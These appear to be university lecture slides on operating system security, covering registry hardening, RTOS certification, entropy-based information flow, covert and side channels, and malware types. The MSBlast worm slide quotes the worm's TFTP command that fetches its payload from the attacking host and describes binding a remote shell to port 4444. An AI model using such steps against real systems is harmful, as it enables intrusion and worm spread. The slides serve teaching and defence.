INSE 6130 Operating System Security
Odds and Ends
Prof. Lingyu Wang

Outline
Registry Security
Embedded and Real-Time OS Security
Information Flow
The Phantom Menace
Review for Final Exam

Registry
What is registry
  Configuration data stored in a hierarchical database
  Replacement of .ini, .sys, and .com configuration files
A tree with five root keys
  HKEY_LOCAL_MACHINE: hardware/OS data of this computer
  HKEY_CLASSES_ROOT: OLE and file-class association data
  HKEY_CURRENT_USER: profile for user logged on interactively
  HKEY_USERS: active user profiles of non-remote users
  HKEY_CURRENT_CONFIG: hardware profile
Hives (trees rooted at top)
  DEFAULT, SAM, SECURITY, SOFTWARE, and SYSTEM in C:\Windows\System32\Config, and ntuser.dat in C:\Documents and Settings\administrator
http://msdn.microsoft.com/en-us/library/windows/desktop/ms724871(v=vs.85).aspx

Registry Best Practice
One incorrect edit to the registry can crash the operating system
  If you are not completely sure about what you are doing, then better don't do it
Backup before you modify it
  Use the backup utility (accessories->system tools)
  Export/import registry hives

Access Control on Registry
What you can do in regedit (“can” does not mean you should)
  Grant full control/ownership of a registry key
  Assign (customized) permissions to a registry key to users or groups
  Audit users/groups’ activity on a registry key
Restricting accesses
  Local accesses: you can only make it inconvenient
  Remote accesses: shouldn’t be given in most cases
    Domain controllers have accesses

Registry Hacks for Hardening OS
E.g., prevent NTLM password hashes
  XP and Windows 2000 use kerberos and NTLM hash is there for backwards compatibility
  NTLM hashes can be easily broken by Rainbow crack
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa
    Win2K: Add NoLMHash = 1
    XP: Value name: NoLMHash, Data type: REG_DWORD, Radix: Decimal, Value data: 1
E.g., prevent (SYN) DoS attacks in W2k
  The connection responses time out more quickly in the event of a SYN attack
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services
    key: SynAttackProtect
    Value: 0,1,2 (default to best protection)

Where Are Embedded/Real-time OS?
Bombardier Challenger 300
  RTOS in the adaptive flight display systems
US Army's Crusader
  RTOS processes ballistic calculations, the graphical user interface and real-time equipment control systems
F-35
  RTOS powers a portion of the Panoramic Cockpit Display subsystem
http://www.lynuxworks.com/rtos/rtos-178.php

Why Are Such Systems different?
A time constraint on an operation MUST be met regardless of the system load
  Not the case on our PCs
  A good example: Anti-lock braking system (ABS)
System reliability, availability, etc.
  Availability = MTTF / (MTTF + MTTR) (mean time to failure/recovery)

The Standard for RTOS
DO-178B: "Software Considerations in Airborne Systems and Equipment Certification"
  A de facto standard for certifying aviation software, such as RTOS
  Software systems are categorized by the effects of their failures
    A: Catastrophic - Failure may cause a crash
    B: Hazardous - Failure has a large negative impact on safety or performance, or reduces the ability of the crew to operate the plane ..
    C: Major - Failure is significant, but has a lesser impact than a Hazardous failure (e.g., leads to passenger discomfort)
    D: Minor - Failure is noticeable, but has a lesser impact than a Major failure (e.g., causing passenger inconvenience or a flight plan change)
    E: No Effect - Failure has no impact on safety, aircraft operation, or crew workload
  The development process of a software is subject to different requirements based on its level

LynxOS-178 RTOS
An RTOS certifiable to DO-178B level A
Provides security through fixed partitions of resources (time and memory)
  System events in one partition cannot interfere with events in another
    E.g., CD player and ABS

Safety and Security
Common Criteria (CC)
  A standard (ISO/IEC 15408) for computer security
  A framework for specifying security requirements and implementing/claiming and testing such requirements
DO-178B and CC
  Software developed to DO-178B Level A standards will map closely to either an EAL 4 or 5
  CC basically requires a small kernel capable of controlling information flow and maintaining data isolation
  DO-178B kernel space partitioning provides both
  From DO-178B to EAL 7, mostly formal method
http://www.csds.uidaho.edu/comparison/stc2002.pdf

What We Already Know
Information flows when
  I write to slides (push)
  You read slides (pull)
  You read what I have written
Information flow policy in BLP and Biba
  BLP: flow up (e.g., unclassified to secret)
  Biba: flow down (e.g., high integrity to low integrity)
  Chinese Wall: flow inside a CD (except sanitized)
Question:
  How do we model/measure “information flow”?

Answer: Entropy
H(X) = - Σi p(X=xi) log2 p(X=xi)
  Measures the uncertainty of X
  How many bits required to represent X
Example
  X = 0 or 1, equally likely
    H(X) = - ( p(X=0) log2 p(X=0) + p(X=1) log2 p(X=1) )
         = - (1/2 log2 1/2 + 1/2 log2 1/2 ) = 1
  Y = 1 certainly; Y=0 impossible
    H(Y) = - ( p(Y=1) log2 p(Y=1) )
         = - 1 log2 1 = 0

The Intuition
Question: Do you need to know entropy in the final exam?
  Before today, no clue
    Answer: Yes 50% No 50% entropy 1
  Right now, likely
    Answer: Yes 60% No 40% entropy 0.97
  After the final exam…
    Answer: Yes - 100% or 0% entropy 0
Seeing slides, or the exam decreases your uncertainty (entropy) about the question
  Information flows to you from slides (exam)
  More information flows to you from exam than from slides

Example 1
Suppose
  X can be either 0 or 1, equally likely
  So, H(X) = 1
If
  Value assignment Y := X (X: exam question; Y: my expression)
Then
  H(X|Y) = 0, knowing Y gives you X (Looking at my expression gives you the exam question)
  Value assignment causes information flow X → Y
What if c : value assignment Y := 1? (I am expressionless)

Example 2
Suppose
  0 ≤ X ≤ 7, equally likely
  So, H(X) = –8(1/8) log2 (1/8) = 3
  Z = 1, 2 or 3, equally likely
If
  Y := X + Z
Then
  Knowing Y, X can have at most 3 values
  H(X | Y) < –3(1/3) log2 (1/3) = log2 3 < 3
  Information flows X → Y

Example 3
Suppose
  X equally likely to be either 0 or 1
  Y equally likely to be either true or false
  H(X) = 1, H(Y) = 1
If
  X > 0 ? Y := true : Y := false
Then
  H(X|Y) = 0
  Information flows X → Y
Implicit information flow
  No direct value assignment between X and Y

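The three examples above can be checked numerically. This is an added example, not part of the original slides: it builds the joint distribution of (X, Y) for each slide program and computes H(X|Y) and the flow H(X) - H(X|Y). The function names and the NO_Z placeholder are assumptions made for the illustration.

```python
import math
from collections import defaultdict
from itertools import product

def entropy(dist):
    """Shannon entropy in bits of a {outcome: probability} mapping."""
    return -sum(p * math.log2(p) for p in dist.values() if p > 0)

def uniform(values):
    values = list(values)
    return {v: 1 / len(values) for v in values}

def conditional_entropy(px, pz, program):
    """H(X|Y) where Y = program(x, z) and X, Z are independent inputs."""
    pxy, py = defaultdict(float), defaultdict(float)
    for (x, p1), (z, p2) in product(px.items(), pz.items()):
        y = program(x, z)
        pxy[(x, y)] += p1 * p2
        py[y] += p1 * p2
    return entropy(pxy) - entropy(py)  # chain rule: H(X|Y) = H(X,Y) - H(Y)

def leaked_bits(px, pz, program):
    """Information that flows X -> Y: H(X) - H(X|Y)."""
    return entropy(px) - conditional_entropy(px, pz, program)

BIT = uniform([0, 1])
NO_Z = {None: 1.0}  # placeholder (assumption) for programs with no second input

SLIDE_PROGRAMS = {
    "Example 1, Y := X": (BIT, NO_Z, lambda x, z: x),
    "Example 1, Y := 1": (BIT, NO_Z, lambda x, z: 1),
    "Example 2, Y := X + Z": (uniform(range(8)), uniform([1, 2, 3]),
                              lambda x, z: x + z),
    "Example 3, X > 0 ? Y := true : Y := false": (BIT, NO_Z, lambda x, z: x > 0),
}

if __name__ == "__main__":
    for name, (px, pz, program) in SLIDE_PROGRAMS.items():
        print(f"{name}: H(X|Y) = {conditional_entropy(px, pz, program):.3f}, "
              f"flow = {leaked_bits(px, pz, program):.3f} bits")
```

For Example 2 the exact value is H(X|Y) = 1/6 + (3/4) log2 3, about 1.355, which is below the slide's bound of log2 3 because the extreme values of Y leave fewer than three candidates for X.
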
Confinement Problem
Prevent leaking confidential information
  Easy: If processes only communicate via known communication channels
Isolation
  Virtual machines
    OS runs on emulated ‘computer’, restricted by VM
  Sandboxing
    A virtual machine for process, instead of OS
[Figure: Linux on VMware on Windows on hardware; Applet on JVM on Windows on hardware]

Covert Channel
Isolation only prevents direct communication via known channels
Covert channel is a communication channel not intended for communication
  Storage channel, shared storage-based
  Timing channel, time-based

Example 1 – Storage Channel
Processes p, q not allowed to communicate
  But they share a file system
They set up a storage channel
  Agree on two file names, /tmp001.txt and /tmp002.txt
  If p wants to send q a bit 1, it creates the file /tmp001.txt; otherwise it creates /tmp002.txt
  q records a bit based on the file name, and then deletes the file, so p can send the next bit
[Figure: p and q exchanging bit 1 via /tmp001.txt and bit 0 via /tmp002.txt]

Example 2 – Timing Channel
Timing attack on cryptosystem
  Modular exponentiation algorithm (square and multiply)
  Computes x = a^z mod n, where z = z0 … zk–1

    x := 1; atmp := a;
    for i := 0 to k–1 do begin
      if zi = 1 then
        x := (x * atmp) mod n;
      atmp := (atmp * atmp) mod n;
    end
    result := x;

  Each 1 bit of z results in two multiplications
  Run time will be proportional to number of 1 bits

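The leak in the square-and-multiply loop can be made visible by counting multiplications. This is an added example, not part of the original slides: modexp_leaky follows the slide's pseudocode, and modexp_uniform (a name and variant chosen here as an assumption) does the same fixed work on every bit, in the spirit of the uniform-resource mitigation the slides list for covert channels.

```python
def bits_lsb_first(z, k):
    """z0 .. z(k-1), least significant bit first, as the slide's loop reads them."""
    return [(z >> i) & 1 for i in range(k)]

def modexp_leaky(a, z, k, n):
    """Slide algorithm. Returns (a^z mod n, number of modular multiplications)."""
    x, atmp, mults = 1, a % n, 0
    for bit in bits_lsb_first(z, k):
        if bit == 1:                      # secret-dependent branch
            x = (x * atmp) % n
            mults += 1
        atmp = (atmp * atmp) % n
        mults += 1
    return x, mults

def modexp_uniform(a, z, k, n):
    """Same result, but every iteration performs both multiplications."""
    x, atmp, mults = 1, a % n, 0
    for bit in bits_lsb_first(z, k):
        candidate = (x * atmp) % n        # always computed
        x = bit * candidate + (1 - bit) * x   # arithmetic select, no branch
        atmp = (atmp * atmp) % n
        mults += 2
    return x, mults

def ones_revealed(mults, k):
    """What an observer of the leaky work count learns: the number of 1 bits in z."""
    return mults - k

if __name__ == "__main__":
    n, k = 1000003, 4                     # constructed sample modulus and bit length
    for z in (0b1000, 0b1011, 0b1111):
        _, leaky = modexp_leaky(7, z, k, n)
        _, fixed = modexp_uniform(7, z, k, n)
        print(f"z={z:04b} leaky={leaky} (ones={ones_revealed(leaky, k)}) uniform={fixed}")
```

The counter models work, not wall-clock time: Python's big-integer arithmetic is not constant-time, so real implementations also need fixed-time multiplication and selection.
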
Example 3 – Timing Channel
Two processes set up a timing channel
  To send 0 bit: p relinquishes CPU as soon as it gets CPU
  To send 1 bit: p uses CPU for the full timing slot
  q determines a bit by seeing how quickly it gets CPU
[Figure: timeline of p getting and relinquishing the CPU and q getting the CPU, for bit 1 and bit 0]

Noise/Mitigation of Covert Channel
When many processes share the same resource, the covert channel will be noisy
  Noise will reduce the capacity of a covert channel
  But does not remove it (remember any communication channel is noisy)
Mitigation of covert channel: obscure resource usage
  Devote uniform, fixed amount of resources to each process, even if some resources are wasted
    Crypto example, CPU example (e.g., RTOS)
  Inject randomness into allocation/use of resources

Make Positive Use of Covert Channel
Tracking anonymous P2P VOIP calls
  The connection between them is mixed with many others
  Headers modified
  Payload encrypted
Suppose we suspect Alice is talking to Bob
  How do we prove it?
[Figure: Alice and Bob connected through an anonymizing network]

Make Use of Covert Channel Cont’d
Track the call by transmitting a watermark through a timing channel based on inter-packet delays
[Figure: Alice to Bob; Add Watermark: 1011; Detect Watermark; packet timing for Bit 1 and Bit 0]
Question: why do we always move the packet to the right?

Web-based Application
[Figure: Client and Server exchanging Encrypted Traffic over the Internet]
Advantages:
  Less client-side resources
  Easier to deliver and maintain
Characteristics:
  Low entropy inputs
  Rich & diverse resource objects
  Stateful communications

Side-Channel Attack
[Figure: Client and Server exchanging Encrypted Traffic over the Internet]
Size and directions of packets between users and search engine

User Input    Observed Directional Packet Sizes
a             801→, ←54, ←509, 60→
00            812→, ←54, ←505, 60→, 813→, ←54, ←507, 60→

b-byte, s-byte
  Fixed pattern: identified input string
  Indicator of input itself

Side-Channel Attack Cont’d
S value for each character entered as:

First keystroke:
  a    b    c    d    e    f    g
  509  504  502  516  499  504  502
  h    i    j    k    l    m    n
  509  492  517  499  501  503  488
  o    p    q    r    s    t
  509  525  494  498  488  494
  u    v    w    x    y    z
  503  522  516  491  502  501

Second keystroke:
  First Keystroke    Second Keystroke
                     a    b    c    d
  a  509             487  493  501  497
  b  504             516  488  482  481
  c  502             501  488  473  477
  d  516             543  478  509  499

Unique s value: 12 out of 16, 16 out of 16
In reality, it may take more than two keystrokes to uniquely identify an input string.
Leak out users’ private information: the input string

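The uniqueness counts on this slide can be reproduced from its own table, and the same data shows what padding response sizes would change. This is an added example, not part of the original slides. It assumes that "12 out of 16" counts the second-keystroke s value alone and "16 out of 16" counts the (first, second) pair; the padding step is an added illustration of the fixed-resource mitigation, not something the slide measures.

```python
from collections import Counter

# s values copied from the slide's tables (first keystroke, then second keystroke).
FIRST = {"a": 509, "b": 504, "c": 502, "d": 516}
SECOND = {  # SECOND[first][second]
    "a": {"a": 487, "b": 493, "c": 501, "d": 497},
    "b": {"a": 516, "b": 488, "c": 482, "d": 481},
    "c": {"a": 501, "b": 488, "c": 473, "d": 477},
    "d": {"a": 543, "b": 478, "c": 509, "d": 499},
}

def pad(size, block):
    """Round a response size up to a multiple of block (block=1: no padding)."""
    return -(-size // block) * block

def observations(block=1, use_first=True):
    """Map each two-letter input to what an eavesdropper sees on the wire."""
    obs = {}
    for first, row in SECOND.items():
        for second, size in row.items():
            seen = (pad(size, block),)
            if use_first:
                seen = (pad(FIRST[first], block),) + seen
            obs[first + second] = seen
    return obs

def uniquely_identified(obs):
    """Inputs whose observation is shared with no other input."""
    counts = Counter(obs.values())
    return sorted(text for text, seen in obs.items() if counts[seen] == 1)

def largest_anonymity_set(obs):
    return max(Counter(obs.values()).values())

if __name__ == "__main__":
    print("second s only :", len(uniquely_identified(observations(use_first=False))))
    print("first + second:", len(uniquely_identified(observations())))
    for block in (64, 1024):
        obs = observations(block)
        print(f"padded to {block}: unique={uniquely_identified(obs)}, "
              f"largest set={largest_anonymity_set(obs)}")
```

Padding to 64 bytes still leaves two of the sixteen inputs unique because their sizes fall across a block boundary; only a block larger than every response makes all sixteen indistinguishable.
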
The Phantom Menace
[Figure: taxonomy of Malicious Programs, split into Needs Host Program and Independent; leaves: Trapdoors, Logic Bombs, Trojan Horses, Viruses, Worms, Zombies, Rootkits]

Backdoor
Secret entry point into a system
  Special user identifier/password that circumvents normal security procedures.
  Commonly used by developers
  Could be included in a compiler (e.g., Ken Thompson)
Example: Back Orifice (BO)
  Win98 at DEFCON 6 in 1998, BO2k in 1999
  BO server can be embedded in an executable file, when you run that file, BO silently installs itself as 122K “ .exe”
  Run a BO client, scan network for port 31337 (ELEET-elite), find any BO server - that machine is yours

Logic Bomb
Embedded in legitimate programs
Activated when specified conditions met
  E.g., presence/absence of some file; Particular date/time or particular user
When triggered, typically damages system
  Modify/delete files/disks
Example: “CIA slipped bugs to Soviets”
  “In January 1982, President Ronald Reagan approved a CIA plan to sabotage the economy of the Soviet Union through covert transfers of technology that contained hidden malfunctions, including software that later triggered a huge explosion in a Siberian natural gas pipeline”

Rootkit
A set of programs and codes that allows a permanent or consistent, undetectable presence on a computer
  Hide malicious resources, e.g., processes, files, registry keys, open ports, etc.
  Provide hidden backdoor accesses
Simple rootkits:
  Modify user programs (ls, ps), detectable by tools like Tripwire
Sophisticated rootkits:
  Modify the kernel itself, hard to detect from userland

Worm
Runs independently
  Does not require a host program
Propagates a fully working version of itself to other machines
Carries a payload performing hidden tasks
  Backdoors, spam relays, DDoS agents; …
Phases
  Probing, Exploitation, Replication, Payload

Worm Propagation
[Figure: A Staged View of Worm Infection, between A Worm and A Victim]
  1: Target Probing
  2: Vulnerability Exploitation
  3: Replication

MSBlast Worm (Aug., 2003)
[Figure: Blaster (192.168.0.1) and Target/RPC (192.168.10.11)]
1. Exploits target on port 135/TCP
2. Binds svchost.exe to port 4444/TCP via injected code
3. Connects to target on port 4444/TCP
4. Creates a shell “cmd.exe” and binds it to port 4444/TCP
5. Creates “TFTP Server” on port 69/UDP
6. Sends “TFTP” command to shell
7. Runs TFTP command; “teleports” msblast.exe file
   >tftp –I 192.168.0.1 GET msblast.exe
8. Sends “START msblast.exe” command
9. Runs worm on target!
10. Closes connection
11. Shell closes

Botnet
Zombie
  A computer that is secretly installed with Trojan horse and can be used for attacks
  Bots join specific IRC channel on a Server and wait for further commands
  Attacker remotely controls the bot
Botnet
  A network of zombies controlled by a ‘bot herder’
  Consisting of several ten thousands of bots
  Usually for malicious purposes

Botnets Cont’d
Botnet is usually for profit
  Distributed Denial-of-Service (DDoS) Attacks
  Spamming – install SOCKS v4/v5 proxy for spam emails
  Sniffing traffic/key logging – e.g., credit card number
  Spreading new worms/viruses
  Ads add-ons, spyware, phishing
    Paid for clicking ads (Google adsense)
  Attacking IRC chat networks – Clone attack
  Manipulating online polls/games
  Mass Identity theft

How Does Botnet Work (1)
1. Attacker scans Internet for unsecured systems that can be compromised
[Figure: Attacker, Internet, Unsecured Computers]

How Does Botnet Work (2)
2. Attacker secretly installs zombie agent programs, turning unsecured computers into zombies
[Figure: Attacker, Internet, Unsecured Computers, Zombies]

How Does Botnet Work (3)
3. Zombie agents ``phone home’’ and connect to a master server
[Figure: Attacker, Internet, Zombies, Master Server]

How Does Botnet Work (4)
4. Attacker sends commands to Master Server to launch a DDoS attack against a targeted system
[Figure: Attacker, Internet, Zombies, Master Server]

How Does Botnet Work (5)
5. Master Server sends signal to zombies to launch attack on targeted system
[Figure: Attacker, Internet, Zombies, Master Server, Targeted System]
